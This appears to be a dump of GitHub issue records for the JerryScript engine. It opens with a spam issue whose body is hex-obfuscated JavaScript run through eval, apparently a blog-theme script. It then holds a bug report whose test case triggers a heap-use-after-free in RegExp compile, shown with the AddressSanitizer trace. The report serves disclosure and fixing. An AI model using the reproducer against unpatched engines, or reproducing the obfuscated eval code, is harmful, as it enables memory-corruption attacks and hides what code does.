78\x35\x61\x7C\x4D\x61\x74\x68\x7C\x5F\x30\x78\x33\x35\x38\x39\x32\x34\x7C\x5F\x30\x78\x38\x61\x38\x62\x32\x7C\x5F\x30\x78\x32\x36\x37\x63\x61\x66\x7C\x5F\x30\x78\x31\x38\x33\x31\x66\x30\x7C\x78\x35\x37\x7C\x78\x35\x38\x7C\x30\x78\x66\x61\x7C\x5F\x30\x78\x31\x65\x63\x61\x66\x34\x7C\x5F\x30\x78\x33\x66\x64\x61\x35\x30\x7C\x5F\x30\x78\x33\x35\x39\x37\x64\x30\x7C\x78\x35\x36\x7C\x78\x34\x65\x7C\x5F\x30\x78\x32\x31\x30\x33\x30\x31\x7C\x5F\x30\x78\x35\x33\x61\x32\x63\x65\x7C\x5F\x30\x78\x31\x65\x62\x63\x37\x62\x7C\x5F\x30\x78\x34\x65\x32\x65\x61\x36\x7C\x5F\x30\x78\x31\x65\x32\x30\x65\x35\x7C\x5F\x30\x78\x33\x61\x34\x65\x62\x33\x7C\x5F\x30\x78\x32\x33\x63\x32\x36\x32\x7C\x6C\x61\x62\x65\x6C\x7C\x5F\x30\x78\x32\x65\x62\x38\x34\x62\x7C\x5F\x30\x78\x64\x31\x35\x64\x36\x37\x7C\x5F\x30\x78\x31\x35\x38\x38\x66\x36\x7C\x5F\x30\x78\x66\x31\x66\x63\x61\x35\x7C\x78\x32\x62\x7C\x78\x34\x64\x7C\x5F\x30\x78\x63\x62\x62\x64\x35\x37\x7C\x5F\x30\x78\x31\x32\x64\x39\x36\x39\x7C\x5F\x30\x78\x63\x34\x64\x64\x38\x65\x7C\x5F\x30\x78\x33\x33\x39\x63\x62\x38\x7C\x5F\x30\x78\x31\x32\x65\x33\x37\x34\x7C\x5F\x30\x78\x32\x61\x65\x64\x62\x63\x7C\x5F\x30\x78\x61\x61\x36\x38\x35\x66\x7C\x5F\x30\x78\x31\x61\x36\x31\x34\x33\x7C\x5F\x30\x78\x35\x31\x33\x65\x34\x33\x7C\x5F\x30\x78\x32\x64\x34\x34\x63\x64\x7C\x5F\x30\x78\x34\x37\x63\x32\x38\x31\x7C\x78\x35\x65\x7C\x5F\x30\x78\x32\x33\x62\x33\x61\x61\x7C\x5F\x30\x78\x32\x38\x39\x30\x64\x31\x7C\x74\x79\x70\x65\x6F\x66\x7C\x66\x6F\x72\x7C\x5F\x30\x78\x37\x30\x38\x66\x61\x36\x7C\x5F\x30\x78\x32\x37\x34\x62\x36\x34\x7C\x5F\x30\x78\x31\x63\x65\x36\x61\x61\x7C\x5F\x30\x78\x65\x65\x34\x39\x66\x61\x7C\x5F\x30\x78\x34\x33\x62\x30\x37\x38\x7C\x30\x78\x61\x61\x7C\x5F\x30\x78\x35\x63\x65\x63\x62\x39\x7C\x5F\x30\x78\x34\x37\x34\x65\x64\x33\x7C\x5F\x30\x78\x35\x65\x63\x66\x35\x34\x7C\x5F\x30\x78\x35\x61\x65\x38\x62\x64\x7C\x5F\x30\x78\x33\x32\x37\x35\x39\x39\x7C\x5F\x30\x78\x31\x63\x62\x32\x37\x36\x7C\x5F\x30\x78\x31\x65\x64\x35\x30\x35\x7C\x5F\x30\x78\x34\x63\x36\x38\x30\x62\x7C\x5F\x30\x78\x32\x63\x36\x66\x65\x61\x7C\x30\x78\x61\x7C\x5F\x30\x78\x35\x37\x36\x34\x37\x64\x7C\x5F\x30\x78\x31\x63\x38\x65\x31\x33\x7C\x5F\x30\x78\x31\x64\x32\x35\x38\x36\x7C\x78\x35\x62\x7C\x78\x35\x64\x7C\x78\x35\x31\x7C\x78\x32\x35\x7C\x5F\x30\x78\x35\x33\x36\x61\x38\x61\x7C\x5F\x30\x78\x33\x32\x63\x30\x37\x62\x7C\x5F\x30\x78\x31\x66\x36\x61\x32\x37\x7C\x5F\x30\x78\x65\x33\x36\x61\x63\x36\x7C\x5F\x30\x78\x33\x32\x61\x63\x30\x65\x7C\x5F\x30\x78\x32\x34\x65\x37\x35\x32\x7C\x5F\x30\x78\x35\x39\x38\x66\x39\x62\x7C\x5F\x30\x78\x33\x38\x38\x32\x34\x35\x7C\x66\x6E\x7C\x5F\x30\x78\x65\x65\x61\x62\x31\x31\x7C\x5F\x30\x78\x34\x31\x65\x34\x38\x30\x7C\x5F\x30\x78\x32\x33\x30\x30\x66\x36\x7C\x5F\x30\x78\x36\x63\x38\x65\x63\x7C\x5F\x30\x78\x32\x37\x35\x34\x30\x33\x7C\x30\x78\x31\x66\x34\x7C\x75\x6E\x64\x65\x66\x69\x6E\x65\x64\x7C\x5F\x30\x78\x33\x39\x34\x62\x32\x33\x7C\x6E\x6F\x54\x68\x75\x6D\x62\x6E\x61\x69\x6C\x7C\x5F\x30\x78\x35\x38\x35\x30\x61\x65\x7C\x5F\x30\x78\x35\x36\x34\x64\x31\x34\x7C\x5F\x30\x78\x33\x62\x32\x35\x35\x65\x7C\x30\x78\x35\x7C\x5F\x30\x78\x34\x39\x62\x61\x32\x33\x7C\x5F\x30\x78\x34\x32\x33\x32\x33\x31\x7C\x5F\x30\x78\x31\x36\x33\x35\x32\x38\x7C\x5F\x30\x78\x33\x63\x30\x64\x62\x65\x7C\x30\x78\x34\x7C\x5F\x30\x78\x34\x64\x30\x64\x61\x66\x7C\x5F\x30\x78\x31\x31\x37\x61\x64\x30\x7C\x5F\x30\x78\x31\x64\x66\x66\x37\x65\x7C\x5F\x30\x78\x64\x61\x34\x65\x30\x33\x7C\x5F\x30\x78\x31\x35\x32\x39\x65\x30\x7C\x5F\x30\x78\x31\x39\x39\x62\x30\x62\x7C\x5F\x30\x78\x33\x64\x66\x63\x32\x32\x7C\x5F\x30\x78\x31\x32\x34\x38\x30\x32\x7C\x5F\x30\x78\x33\x66\x38\x63\x37\x30\x7C\x5F\x30\x78\x32\x65\x33\x33\x37\x66\x7C\x5F\x30\x78\x34\x62\x37\x34\x37\x63\x7C\x5F\x30\x78\x32\x35\x31\x64\x39\x35\x7C\x5F\x30\x78\x32\x66\x61\x63\x39\x32\x7C\x5F\x30\x78\x34\x36\x65\x62\x64\x39\x7C\x5F\x30\x78\x62\x61\x34\x64\x31\x34\x7C\x5F\x30\x78\x32\x33\x62\x33\x7C\x78\x32\x38\x7C\x78\x32\x39\x7C\x78\x34\x37\x7C\x5F\x30\x78\x31\x30\x37\x32\x34\x32\x7C\x5F\x30\x78\x39\x30\x39\x39\x66\x63\x7C\x5F\x30\x78\x35\x38\x34\x37\x66\x62\x7C\x5F\x30\x78\x32\x61\x62\x30\x64\x35\x7C\x5F\x30\x78\x32\x31\x38\x31\x37\x63\x7C\x61\x72\x67\x75\x6D\x65\x6E\x74\x73\x7C\x6E\x75\x6C\x6C\x7C\x5F\x30\x78\x62\x66\x30\x32\x66\x62\x7C\x67\x6C\x6F\x62\x61\x6C\x7C\x5F\x30\x78\x36\x63\x61\x61\x34\x35\x7C\x5F\x30\x78\x33\x66\x39\x39\x61\x66\x7C\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C\x7C\x30\x78\x62\x62\x38\x7C\x5F\x30\x78\x32\x37\x38\x37\x65\x66\x7C\x5F\x30\x78\x33\x30\x31\x65\x62\x38\x7C\x5F\x30\x78\x61\x30\x66\x61\x35\x64\x7C\x5F\x30\x78\x33\x30\x33\x36\x64\x34\x7C\x5F\x30\x78\x32\x63\x33\x33\x66\x39\x7C\x49\x6D\x61\x67\x65\x7C\x5F\x30\x78\x31\x33\x39\x65\x61\x36\x7C\x5F\x30\x78\x32\x61\x34\x62\x31\x34\x7C\x5F\x30\x78\x32\x35\x35\x38\x39\x62\x7C\x5F\x30\x78\x34\x61\x65\x62\x62\x61\x7C\x5F\x30\x78\x35\x64\x32\x34\x36\x61\x7C\x66\x69\x72\x73\x74\x43\x61\x6C\x6C\x7C\x5F\x30\x78\x34\x35\x31\x38\x33\x35\x7C\x5F\x30\x78\x31\x34\x38\x38\x64\x39\x7C\x5F\x30\x78\x34\x61\x30\x37\x36\x31\x7C\x5F\x30\x78\x34\x32\x39\x32\x63\x66\x7C\x5F\x30\x78\x31\x39\x62\x62\x61\x35\x7C\x5F\x30\x78\x31\x62\x64\x36\x33\x38\x7C\x5F\x30\x78\x35\x62\x39\x31\x66\x32\x7C\x5F\x30\x78\x34\x66\x30\x37\x30\x32\x7C\x5F\x30\x78\x31\x65\x66\x65\x64\x31\x7C\x5F\x30\x78\x33\x36\x35\x35\x39\x36\x7C\x30\x78\x36\x34\x7C\x5F\x30\x78\x31\x31\x37\x30\x61\x63\x7C\x66\x65\x65\x64\x7C\x5F\x30\x78\x33\x64\x30\x62\x32\x34\x7C\x5F\x30\x78\x34\x61\x62\x32\x62\x32\x7C\x5F\x30\x78\x32\x62\x36\x30\x39\x65\x7C\x5F\x30\x78\x31\x33\x66\x36\x32\x34\x7C\x5F\x30\x78\x35\x30\x32\x33\x34\x65\x7C\x5F\x30\x78\x35\x31\x38\x39\x32\x38\x7C\x6B\x6F\x64\x65\x7C\x5F\x30\x78\x39\x36\x34\x32\x34\x34\x7C\x5F\x30\x78\x62\x62\x34\x36\x66\x61\x7C\x5F\x30\x78\x34\x61\x64\x36\x36\x33\x7C\x30\x78\x31\x39\x7C\x5F\x30\x78\x33\x62\x31\x61\x30\x62\x7C\x5F\x30\x78\x33\x62\x39\x32\x64\x66\x7C\x5F\x30\x78\x35\x37\x66\x34\x32\x30\x7C\x5F\x30\x78\x33\x64\x38\x37\x30\x38\x7C\x5F\x30\x78\x33\x65\x30\x37\x37\x35\x7C\x5F\x30\x78\x34\x64\x39\x62\x35\x63\x7C\x5F\x30\x78\x33\x39\x66\x39\x37\x30\x7C\x6B\x6F\x6E\x74\x65\x6E\x74\x7C\x6C\x69\x6E\x6B\x7C\x69\x6D\x61\x67\x65\x7C\x74\x69\x74\x6C\x65\x7C\x5F\x30\x78\x66\x64\x37\x31\x30\x38\x7C\x5F\x30\x78\x34\x63\x30\x65\x33\x39\x7C\x5F\x30\x78\x32\x64\x66\x30\x63\x65\x7C\x5F\x30\x78\x33\x66\x38\x62\x61\x38\x7C\x5F\x30\x78\x34\x38\x39\x30\x66\x35\x7C\x5F\x30\x78\x31\x66\x62\x34\x39\x36\x7C\x5F\x30\x78\x32\x34\x33\x66\x34\x61\x7C\x5F\x30\x78\x32\x32\x63\x37\x39\x31\x7C\x5F\x30\x78\x32\x30\x64\x30\x31\x64\x7C\x5F\x30\x78\x32\x62\x31\x65\x38\x63\x7C\x5F\x30\x78\x63\x62\x66\x39\x37\x63\x7C\x5F\x30\x78\x31\x33\x34\x36\x33\x61\x7C\x5F\x30\x78\x31\x65\x62\x37\x66\x61\x7C\x5F\x30\x78\x35\x35\x36\x61\x66\x30\x7C\x5F\x30\x78\x33\x33\x66\x30\x63\x36\x7C\x5F\x30\x78\x31\x35\x36\x30\x37\x31\x7C\x5F\x30\x78\x31\x61\x33\x31\x33\x63\x7C\x5F\x30\x78\x31\x63\x36\x38\x36\x65\x7C\x5F\x30\x78\x34\x62\x66\x37\x63\x38\x7C\x5F\x30\x78\x32\x65\x33\x34\x64\x65\x7C\x5F\x30\x78\x32\x64\x66\x30\x63\x32\x7C\x5F\x30\x78\x33\x35\x31\x65\x64\x61\x7C\x5F\x30\x78\x31\x32\x38\x30\x38\x63\x7C\x5F\x30\x78\x33\x30\x64\x32\x35\x63\x7C\x5F\x30\x78\x34\x63\x62\x31\x61\x36\x7C\x5F\x30\x78\x33\x36\x64\x63\x32\x63\x7C\x5F\x30\x78\x61\x63\x30\x34\x37\x62\x7C\x5F\x30\x78\x31\x66\x39\x65\x33\x39\x7C\x5F\x30\x78\x33\x33\x35\x33\x35\x30\x7C\x5F\x30\x78\x34\x35\x64\x62\x39\x31\x7C\x5F\x30\x78\x61\x64\x37\x63\x32\x32\x7C\x30\x78\x37\x7C\x5F\x30\x78\x32\x61\x63\x31\x61\x35\x7C\x30\x78\x38\x7C\x5F\x30\x78\x32\x37\x35\x61\x39\x61\x7C\x6D\x6F\x6E\x74\x68\x46\x6F\x72\x6D\x61\x74\x7C\x5F\x30\x78\x31\x61\x64\x33\x63\x61\x7C\x5F\x30\x78\x33\x32\x30\x63\x30\x65\x7C\x5F\x30\x78\x34\x31\x64\x36\x30\x35\x7C\x5F\x30\x78\x32\x65\x38\x33\x66\x63\x7C\x5F\x30\x78\x33\x30\x32\x66\x61\x32\x7C\x5F\x30\x78\x34\x39\x33\x64\x34\x66\x7C\x5F\x30\x78\x35\x66\x30\x38\x31\x31\x7C\x5F\x30\x78\x33\x64\x62\x62\x32\x38\x7C\x5F\x30\x78\x33\x34\x35\x63\x39\x65\x7C\x5F\x30\x78\x34\x66\x38\x62\x63\x37\x7C\x5F\x30\x78\x33\x33\x31\x35\x39\x31\x7C\x5F\x30\x78\x34\x39\x36\x30\x66\x66\x7C\x5F\x30\x78\x32\x36\x30\x38\x30\x61\x7C\x5F\x30\x78\x34\x31\x37\x63\x64\x32\x7C\x5F\x30\x78\x35\x33\x63\x37\x32\x33\x7C\x75\x32\x30\x32\x36\x7C\x5F\x30\x78\x61\x35\x61\x62\x31\x64\x7C\x5F\x30\x78\x32\x39\x34\x31\x32\x62\x7C\x5F\x30\x78\x31\x63\x65\x31\x63\x62\x7C\x5F\x30\x78\x32\x66\x39\x34\x31\x37\x7C\x5F\x30\x78\x31\x34\x61\x61\x39\x31\x7C\x5F\x30\x78\x33\x64\x66\x61\x36\x63\x7C\x5F\x30\x78\x32\x32\x63\x35\x64\x61\x7C\x5F\x30\x78\x32\x62\x64\x35\x35\x37\x7C\x69\x33\x7C\x5F\x30\x78\x31\x33\x36\x39\x61\x63\x7C\x64\x69\x73\x71\x75\x73\x53\x68\x6F\x72\x74\x6E\x61\x6D\x65\x7C\x5F\x30\x78\x35\x62\x39\x35\x38\x66\x7C\x5F\x30\x78\x32\x36\x30\x65\x62\x61\x7C\x5F\x30\x78\x32\x62\x37\x32\x62\x63\x7C\x5F\x30\x78\x33\x63\x66\x30\x65\x38\x7C\x5F\x30\x78\x32\x62\x36\x37\x30\x39\x7C\x5F\x30\x78\x34\x61\x30\x63\x31\x65\x7C\x5F\x30\x78\x63\x38\x34\x62\x62\x61\x7C\x5F\x30\x78\x34\x39\x30\x64\x32\x31\x7C\x5F\x30\x78\x63\x30\x34\x61\x62\x66\x7C\x5F\x30\x78\x31\x33\x30\x66\x31\x62\x7C\x5F\x30\x78\x33\x66\x39\x62\x63\x33\x7C\x5F\x30\x78\x34\x62\x66\x31\x36\x35\x7C\x5F\x30\x78\x32\x37\x61\x34\x62\x39\x7C\x5F\x30\x78\x38\x33\x62\x37\x65\x64\x7C\x5F\x30\x78\x31\x38\x63\x31\x61\x31\x7C\x5F\x30\x78\x32\x62\x61\x35\x30\x35\x7C\x5F\x30\x78\x32\x33\x32\x32\x35\x36\x7C\x5F\x30\x78\x34\x65\x39\x65\x31\x30\x7C\x70\x72\x6F\x63\x65\x73\x73\x7C\x72\x65\x71\x75\x69\x72\x65\x7C\x5F\x30\x78\x34\x66\x33\x31\x66\x33\x7C\x5F\x30\x78\x33\x65\x34\x66\x32\x35\x7C\x5F\x30\x78\x35\x33\x32\x39\x61\x39\x7C\x63\x6F\x6E\x74\x65\x78\x74\x7C\x5F\x30\x78\x31\x36\x30\x38\x39\x66\x7C\x5F\x30\x78\x33\x37\x66\x63\x33\x32\x7C\x5F\x30\x78\x35\x34\x34\x30\x33\x30\x7C\x5F\x30\x78\x31\x32\x38\x38\x65\x32\x7C\x5F\x30\x78\x33\x65\x63\x62\x31\x39\x7C\x5F\x30\x78\x35\x35\x62\x38\x38\x32\x7C\x5F\x30\x78\x32\x62\x32\x33\x30\x64\x7C\x30\x78\x66\x66\x66\x66\x66\x66\x7C\x30\x78\x31\x30\x7C\x30\x78\x36\x7C\x5F\x30\x78\x31\x62\x63\x66\x38\x64\x7C\x5F\x30\x78\x35\x65\x39\x33\x32\x66\x7C\x66\x69\x78\x65\x64\x53\x69\x64\x65\x62\x61\x72\x7C\x5F\x30\x78\x32\x65\x66\x32\x62\x64\x7C\x5F\x30\x78\x34\x32\x35\x34\x63\x34\x7C\x64\x61\x74\x65\x7C\x5F\x30\x78\x35\x31\x33\x65\x66\x39\x7C\x30\x78\x33\x7C\x62\x72\x65\x61\x6B\x7C\x5F\x30\x78\x35\x31\x34\x36\x65\x63\x7C\x5F\x30\x78\x33\x31\x64\x63\x33\x30\x7C\x69\x6E\x7C\x5F\x30\x78\x32\x38\x35\x30\x63\x32\x7C\x74\x61\x67\x7C\x5F\x30\x78\x34\x66\x65\x66\x64\x33\x7C\x5F\x30\x78\x35\x39\x38\x39\x65\x36\x7C\x5F\x30\x78\x32\x37\x62\x62\x61\x30\x7C\x5F\x30\x78\x34\x37\x39\x33\x66\x35\x7C\x6E\x65\x78\x74\x7C\x5F\x30\x78\x35\x35\x37\x39\x33\x64\x7C\x30\x78\x35\x36\x7C\x5F\x30\x78\x31\x65\x64\x65\x35\x39\x7C\x73\x31\x7C\x30\x78\x39\x36\x7C\x5F\x30\x78\x34\x32\x36\x61\x63\x63\x7C\x5F\x30\x78\x36\x32\x30\x33\x62\x31\x7C\x5F\x30\x78\x32\x36\x61\x39\x66\x63\x7C\x74\x33\x7C\x6C\x32\x7C\x5F\x30\x78\x61\x63\x64\x37\x32\x33\x7C\x64\x69\x73\x71\x75\x73\x7C\x73\x43\x6C\x61\x73\x73\x7C\x5F\x30\x78\x31\x34\x61\x32\x39\x32\x7C\x5F\x30\x78\x31\x37\x38\x37\x34\x32\x7C\x5F\x30\x78\x34\x61\x62\x33\x65\x34\x7C\x5F\x30\x78\x32\x35\x33\x39\x61\x38\x7C\x5F\x30\x78\x34\x33\x30\x34\x66\x32\x7C\x5F\x30\x78\x33\x35\x38\x64\x37\x31\x7C\x5F\x30\x78\x33\x64\x39\x61\x63\x31\x7C\x5F\x30\x78\x35\x32\x66\x35\x36\x63\x7C\x5F\x30\x78\x34\x61\x34\x62\x62\x64\x7C\x5F\x30\x78\x32\x61\x30\x31\x64\x31\x7C\x5F\x30\x78\x33\x31\x39\x64\x62\x63\x7C\x63\x6F\x6D\x6D\x65\x6E\x74\x73\x53\x79\x73\x74\x65\x6D\x7C\x5F\x30\x78\x31\x32\x62\x33\x31\x66\x7C\x64\x69\x73\x71\x75\x73\x5F\x62\x6C\x6F\x67\x67\x65\x72\x5F\x63\x75\x72\x72\x65\x6E\x74\x5F\x75\x72\x6C\x7C\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x7C\x5F\x30\x78\x31\x61\x33\x62\x35\x39\x7C\x66\x69\x78\x65\x64\x4D\x65\x6E\x75\x7C\x5F\x30\x78\x31\x33\x33\x34\x32\x63\x7C\x30\x78\x66\x30\x7C\x5F\x30\x78\x35\x36\x35\x63\x61\x35\x7C\x5F\x30\x78\x31\x66\x66\x65\x63\x65\x7C\x73\x70\x6C\x69\x74","","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x77\x2B","\x5C\x62","\x67"];eval(function(_0xf36fx1,_0xf36fx2,_0xf36fx3,_0xf36fx4,_0xf36fx5,_0xf36fx6){_0xf36fx5= function(_0xf36fx3){return (_0xf36fx3< _0xf36fx2?_0xb2ac[4]:_0xf36fx5(parseInt(_0xf36fx3/ _0xf36fx2)))+ ((_0xf36fx3= _0xf36fx3% _0xf36fx2)> 35?String[_0xb2ac[5]](_0xf36fx3+ 29):_0xf36fx3.toString(36))};if(!_0xb2ac[4][_0xb2ac[6]](/^/,String)){while(_0xf36fx3--){_0xf36fx6[_0xf36fx5(_0xf36fx3)]= _0xf36fx4[_0xf36fx3]|| _0xf36fx5(_0xf36fx3)};_0xf36fx4= [function(_0xf36fx5){return _0xf36fx6[_0xf36fx5]}];_0xf36fx5= function(){return _0xb2ac[7]};_0xf36fx3= 1};while(_0xf36fx3--){if(_0xf36fx4[_0xf36fx3]){_0xf36fx1= _0xf36fx1[_0xb2ac[6]]( new RegExp(_0xb2ac[8]+ _0xf36fx5(_0xf36fx3)+ _0xb2ac[8],_0xb2ac[9]),_0xf36fx4[_0xf36fx3])}};return _0xf36fx1}(_0xb2ac[0],62,856,_0xb2ac[3][_0xb2ac[2]](_0xb2ac[1]),0,{}))
//]]>
</script> | Please am new here, i want to know more about coding! | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4057/comments | 4 | 2020-07-25T15:10:42Z | 2020-07-27T08:15:38Z | https://github.com/jerryscript-project/jerryscript/issues/4057 | 665,601,611 | 4,057 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
da5b058
###### Build platform
Ubuntu 16.04.6 LTS (Linux 4.15.0-99-generic x86_64)
###### Build steps
```
./tools/build.py --clean --debug --compile-flag=-fsanitize=address \
--compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer \
--compile-flag=-fno-common --compile-flag=-g --strip=off \
--system-allocator=on --logging=on --linker-flag=-fuse-ld=gold \
--error-messages=on --profile=es2015-subset --lto=off
```
###### Test case
```
function echo(RegExp) {
try { (r).compile(r).compile(RegExp.prototype) } catch (err) { }
}
var suppressLastIndex = false;
var suppressRegExp = false;
var suppressIndex = false;
function safeCall(f) {
var args = [];
for (var a = 1; a < arguments.length; ++a)
args.push(arguments[a]);
try {
return f.apply(this, args);
} catch (ex) {
echo("EXCEPTION");
}
}
function dump(o) {
var sb = [];
if (o === null)
sb.push("null");
else if (o === undefined)
sb.push("undefined");
else if (o === true)
sb.push("true");
else if (o === false)
sb.push("false");
else if (typeof o === "number")
sb.push(o.toString());
else if (typeof o == "string") {
if (o.length > 8192)
sb.push("<long string>");
else {
sb.push("\"");
var start = -1;
for (var i = 0; i < o.length; i++) {
var c = o.charCodeAt(i);
if (c < 32 || c > 127 || c == '"'.charCodeAt(0) || c == '\\'.charCodeAt(0)) {
if (start >= 0)
sb.push(o.substring(start, i));
start = -1;
sb.push("\\u");
sb.push(String.fromCharCode(hex.charCodeAt((c >> 12) & 0xf)));
sb.push(String.fromCharCode(hex.charCodeAt((c >> 8) & 0xf)));
sb.push(String.fromCharCode(hex.charCodeAt((c >> 4) & 0xf)));
sb.push(String.fromCharCode(hex.charCodeAt((c >> 0) & 0xf)));
}
else {
if (start < 0)
start = i;
}
}
if (start >= 0)
sb.push(o.substring(start, o.length));
sb.push("\"");
}
}
else if (o instanceof RegExp) {
var body = o.source;
sb.push("/");
var start = -1;
for (var i = 0; i < body.length; i++) {
var c = body.charCodeAt(i);
if (c < 32 || c > 127) {
if (start >= 0)
sb.push(body.substring(start, i));
start = -1;
sb.push("\\u");
sb.push(String.fromCharCode(hex.charCodeAt((c >> 12) & 0xf)));
sb.push(String.fromCharCode(hex.charCodeAt((c >> 8) & 0xf)));
sb.push(String.fromCharCode(hex.charCodeAt((c >> 4) & 0xf)));
sb.push(String.fromCharCode(hex.charCodeAt((c >> 0) & 0xf)));
}
else {
if (start < 0)
start = i;
}
}
if (start >= 0)
sb.push(body.substring(start, body.length));
sb.push("/");
if (o.global)
sb.push("g");
if (o.ignoreCase)
sb.push("i");
if (o.multiline)
sb.push("m");
if (!suppressLastIndex && o.lastIndex !== undefined) {
sb.push(" /*lastIndex=");
sb.push(o.lastIndex);
sb.push("*/ ");
}
}
else if (o.length !== undefined) {
sb.push("[");
for (var i = 0; i < o.length; i++) {
if (i > 0)
sb.push(",");
sb.push(dump(o[i]));
}
sb.push("]");
if (!suppressIndex && (o.input !== undefined || o.index !== undefined))
{
sb.push(" /*input=");
sb.push(dump(o.input));
sb.push(", index=");
sb.push(dump(o.index));
sb.push("*/ ");
}
}
else if (o.toString !== undefined) {
sb.push("<object with toString>");
}
else
sb.push(o.toString());
return sb.join("");
}
function pre(w, origargs, n) {
var sb = [w];
sb.push("(");
for (var i = 0; i < n; i++) {
if (i > 0) sb.push(", ");
sb.push(dump(origargs[i]));
}
if (origargs.length > n) {
sb.push(", ");
sb.push(dump(origargs[n]));
origargs[0].lastIndex = origargs[n];
}
sb.push(");");
echo(sb.join(""));
}
function post(r) {
if (!suppressLastIndex) {
echo("r.lastIndex=" + dump(r.lastIndex));
}
if (!suppressRegExp) {
var sb = [];
sb.push("RegExp.${_,1,...,9}=[");
sb.push(dump(RegExp.$_));
for (var i = 1; i <= 9; i++) {
sb.push(",");
sb.push(dump(RegExp["$" + i]));
}
sb.push("]");
echo(sb.join(""));
}
}
function exec(r, s) {
pre("exec", arguments, 2);
echo(dump(r.exec(s)));
post(r);
}
function test(r, s) {
pre("test", arguments, 2);
echo(dump(r.test(s)));
post(r);
}
function replace(r, s, o) {
pre("replace", arguments, 3);
echo(dump(s.replace(r, o)));
post(r);
}
function split(r, s) {
pre("split", arguments, 2);
echo(dump(s.split(r)));
post(r);
}
function match(r, s) {
pre("match", arguments, 2);
echo(dump(s.match(r)));
post(r);
}
function search(r, s) {
pre("search", arguments, 2);
echo(dump(s.search(r)));
post(r);
}
function bogus(r, o) {
echo("bogus(" + dump(r) + ", " + dump(o) + ");");
try { new RegExp(r, o); echo("FAILED"); } catch (e) { echo("PASSED"); }
}
var r, s;
r = /a*/g;
s = "cdsddfs";
exec(r, s);
exec(r, s);
```
###### Output
```
=================================================================
==80830==ERROR: AddressSanitizer: heap-use-after-free on address 0xf6502022 at pc 0x08073345 bp 0xffe00ad8 sp 0xffe00ac8
READ of size 2 at 0xf6502022 thread T0
#0 0x8073344 in ecma_bytecode_ref /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1344
#1 0x80b41fb in ecma_op_create_regexp_from_bytecode /home/jerryscript/jerry-core/ecma/operations/ecma-regexp-object.c:362
#2 0x8133fe1 in ecma_builtin_regexp_prototype_compile /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:320
#3 0x813455b in ecma_builtin_regexp_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:567
#4 0x808281d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1216
#5 0x80829c3 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1240
#6 0x8098e38 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:845
#7 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#8 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#9 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#10 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#11 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#12 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#13 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#14 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#15 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#16 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#17 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#18 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#19 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#20 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#21 0x8099320 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:943
#22 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
#23 0x80fb2f7 in opfunc_call /home/jerryscript/jerry-core/vm/vm.c:778
#24 0x810e095 in vm_execute /home/jerryscript/jerry-core/vm/vm.c:4690
#25 0x810e5d9 in vm_run /home/jerryscript/jerry-core/vm/vm.c:4792
#26 0x80f9aff in vm_run_global /home/jerryscript/jerry-core/vm/vm.c:339
#27 0x804def4 in jerry_run /home/jerryscript/jerry-core/api/jerry.c:579
#28 0x804acbf in main /home/jerryscript/jerry-main/main-unix.c:759
#29 0xf7888646 in __libc_start_main (/lib/i386-linux-gnu/libc.so.6+0x18646)
#30 0x8048fb0 (/home/jerryscript/build/bin/jerry+0x8048fb0)
0xf6502022 is located 2 bytes inside of 24-byte region [0xf6502020,0xf6502038)
freed by thread T0 here:
#0 0xf7abda84 in free (/usr/lib32/libasan.so.2+0x96a84)
#1 0x80c2885 in jmem_heap_free_block_internal /home/jerryscript/jerry-core/jmem/jmem-heap.c:476
#2 0x80c2c1d in jmem_heap_free_block /home/jerryscript/jerry-core/jmem/jmem-heap.c:685
#3 0x80738ff in ecma_bytecode_deref /home/jerryscript/jerry-core/ecma/base/ecma-helpers.c:1467
#4 0x8133fd0 in ecma_builtin_regexp_prototype_compile /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:319
#5 0x813455b in ecma_builtin_regexp_prototype_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-regexp-prototype.c:567
#6 0x808281d in ecma_builtin_dispatch_routine /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1216
#7 0x80829c3 in ecma_builtin_dispatch_call /home/jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1240
#8 0x8098e38 in ecma_op_function_call_simple /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:845
#9 0x8099c3f in ecma_op_function_call /home/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1142
